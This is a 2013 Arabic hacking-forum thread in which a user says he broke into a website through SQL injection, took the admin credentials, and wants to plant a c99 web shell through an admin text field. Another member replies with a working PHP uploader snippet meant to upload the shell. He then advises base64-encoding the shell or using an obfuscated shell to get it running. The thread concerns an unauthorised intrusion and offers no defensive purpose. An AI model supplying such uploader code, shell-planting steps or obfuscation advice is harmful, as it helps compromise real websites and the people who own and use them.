التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-20-2013, 05:38 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road

مطلوب مجاب: دمج xss مع sql الرجاء الدخول مبتدا او محترف


السلام عليكم

البارح بينما كنت ابحث في المواقع المصابة بثغرات sql
وجدت احد المواقع المصابة وبعد سحب اليوزر والباس من قاعدة البيانات و الدخول بحساب الادمين
بحثت كالعادة عن مركز تحميل ملفات فلم اجد
كل ما وجدته كان <textaera> اي ان قالب الصفحة موجود مع مكان لادخال نصوص
مفهوم ؟؟
المهم قلت اجرب كود جافا سكريبت و كانني ابحث عن ثغرة xss وضعت الكود فاشتغل
مفهوم ؟
المهم قلت لمادا لااضع الشل كاملا فهو في الاساس ليس الا اكواد php\
فتحت شل c99 بالمفكرة و عملت copy و لصقت كود الشل في مكان ادخال النصوص
ما رايكم هل اشتغل ؟


الاجابة هي نعم و لا
اشتغل و لكن في شكل ازرار مبعثرة و مخربطة في كافة ارجاء الصفحة
السوال هل يمكن استعمال هده الطريقة فعلا في حقن الشل و كيف ؟؟؟




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC ]l[ xss lu sql hgv[hx hg]o,g lfj]h h, lpjvt

   

رد مع اقتباس
أفضل جواب - كتبه MaFia
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

كود:
<b>ApendiX</b> <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; } else { echo '<b>Upload Failed! </b><br><br>'; } } ?>
وبعدها ارفع شيلك منه
قديم 08-22-2013, 12:47 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف


احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

كود:
<b>ApendiX</b> <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Done The Work!!!</b><br><br>'; } else { echo '<b>Upload Failed! </b><br><br>'; } } ?>
وبعدها ارفع شيلك منه
التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
قديم 08-22-2013, 02:34 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road

افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف


اقتباس
احذف كود الشل من لوحة التحكم
وهذا كود ابلود هيشتغل معاك ان شاء الله

للاسف لم تشتغل ظهر هادا ا
ApendiX
echo '
'.php_uname().'
';
echo '';
echo '';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Done The Work!!!

'; }
else { echo 'Upload Failed!

'; }
}
?>

   

رد مع اقتباس
قديم 08-22-2013, 11:43 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: دمج xss مع sql الرجاء الدخول مبتدا او محترف


جرب تشفر الكود
base64

او شوف شل غير c99 او r57
يكون مشفر

وان شاء الله هيشتغل معاك

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:04 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0